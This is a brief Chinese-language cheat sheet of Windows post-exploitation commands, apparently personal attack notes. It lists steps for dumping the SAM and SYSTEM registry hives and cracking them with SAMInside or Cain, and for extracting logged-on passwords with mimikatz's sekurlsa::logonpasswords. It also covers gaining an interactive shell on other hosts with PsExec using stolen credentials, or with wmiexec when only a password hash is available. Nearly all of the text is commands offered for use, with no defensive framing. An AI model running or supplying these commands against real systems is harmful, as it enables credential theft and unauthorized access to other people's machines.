使用SAMInside获取用户密码
reg save hklmsam C:/sam.hive
reg save hklmsystem C:/system.hive
用cain解密
或者复制sam到自己本机上然后再用
mimikatz获取登陆过的账号密码
mimikatz
log
privilege::debug
sekurlsa::logonpasswords
在开启smb的情况下,却没有3389
在获取主机账号和密码的时候
PsExec.exe 可以获取一个交互式的shell
psexec \hostIp -u [username] -p [password] cmd
在没有密码只有hash的时候
wmiexec.exe 可以执行命令,一次执行一条命令
